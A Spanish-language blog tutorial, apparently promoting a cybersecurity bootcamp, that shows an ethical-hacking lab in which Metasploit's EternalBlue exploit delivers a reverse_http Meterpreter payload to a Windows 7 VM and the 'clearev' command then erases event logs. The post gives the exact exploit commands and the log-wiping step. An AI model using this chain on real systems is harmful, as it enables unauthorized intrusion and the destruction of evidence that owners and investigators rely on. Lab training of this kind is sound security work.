El siguiente tutorial sobre cómo hacer un borrado de huellas con Meterpreter está hecho con fines educativos. El propósito de la técnica es medir el alcance de las actividades que un atacante puede cometer al explotar una vulnerabilidad informática. En otras palabras, permite calcular el nivel de riesgo de un ataque al sistema.
El pentesting o hacking ético consiste en aplicar las mismas técnicas que un atacante malicioso para poner a prueba la seguridad de un sistema informático. Entonces, al aplicar un test de penetración, se deben ejecutar las mismas fases que en un ciberataque real. Las fases de un test de intrusión son, normalmente:
- Recolección de información pasiva.
- Enumeración activa.
- Búsqueda de vulnerabilidades.
- Explotación de vulnerabilidades.
- Postexplotación.
- Borrado de huellas.
- Informe de seguridad.
En este post, daremos un ejemplo sobre cómo se realiza la penúltima fase de un pentest, con el fin de entender cómo actúan los hackers en un sistema, después de haber realizado el ataque. A continuación, veremos cómo hacer un borrado de huellas con Meterpreter.
Borrado de huellas con Meterpreter
Meterpreter es un payload, es decir, un código malicioso que se puede ejecutar tras explotar una vulnerabilidad en un sistema. Meterpreter sirve para ejecutar comandos de forma remota en una máquina comprometida y funciona a muy bajo nivel. Por lo tanto, es altamente difícil de detectar por sistemas de antivirus. Ahora, veremos cómo hacer un borrado de huellas con Meterpreter, después de un test de intrusión.
Preparación
Lo primero que haremos en este tutorial es crear un laboratorio de ejercicios de hacking ético con máquinas virtuales. Para ello, puedes utilizar el software de virtualización que prefieras, por ejemplo, VMware, VirtualBox o KVM.
Para nuestro laboratorio, crearemos dos máquinas virtuales:
- Sistema operativo Kali Linux.
- Sistema operativo Windows 7 (la versión más antigua que te permita elegir).
🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴
Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada
👉 Prueba gratis el Bootcamp en Ciberseguridad por una semanaRecuerda usar el modo de conexión NAT para ambas máquinas virtuales, con el fin de usar direcciones IP relacionadas a tu router real.
Ejecución del payload
Para ejecutar el borrado de huellas con Meterpreter:
- Primero, abre tu máquina virtual con el sistema operativo Kali Linux. Allí, desde una terminal, abre la consola de Metasploit con el comando:
msfconsole
- Ahora, usaremos el exploit EternalBlue. Para escogerlo, usa el comando:
use exploit/windows/smb/ms17_010_eternalblue
- Luego, configuraremos que el exploit ejecute el payload de Meterpreter justo después de vulnerar al sistema. Esto nos dará acceso remoto a la máquina con Windows 7.
set payload windows/x64/meterpreter/reverse_http
- A continuación, fijaremos los parámetros “LPORT” con el número de puerto local de Kali desde el que queramos ejecutar el payload, y “RHOSTS” con la dirección IP de la máquina Windows 7 (para obtener esta dirección, abre una terminal en la máquina y ejecuta el comando “ipconfig”). Para fijar estos valores, ejecuta los comandos:
set LPORT 5555 set RHOSTS <IP de la máquina con Win7>
- Por último, para ejecutar el exploit junto con el payload, utiliza el comando:
exploit
Borrado de huellas
Después de seguir los pasos anteriores, podrás usar Meterpreter para ejecutar todo tipo de acciones en la máquina comprometida. Puedes subir y descargar archivos, hacer modificaciones, acceder a la webcam, el teclado, la pantalla y mucho más. Sin embargo, al finalizar tu test de intrusión, querrás borrar toda la evidencia de los logs. Para ello, el método es tan simple como utilizar el comando:
clearev
El comando de Meterpreter “clearev” sirve para eliminar todos los registros de los logs realizados por un atacante en el ordenador. Por eso, se puede usar como método de borrado de huellas al final de un test de intrusión.
Ya hemos visto cómo ejecutar un borrado de huellas con Meterpreter. Si quieres aprender más sobre técnicas de hacking ético, en KeepCoding tenemos un curso intensivo diseñado especialmente para ti. Ingresa a nuestro Ciberseguridad Full Stack Bootcamp y conviértete en experto en esta rama del sector IT en tan solo 7 meses. ¡No sigas esperando para pedir información e impulsa tus sueños ahora!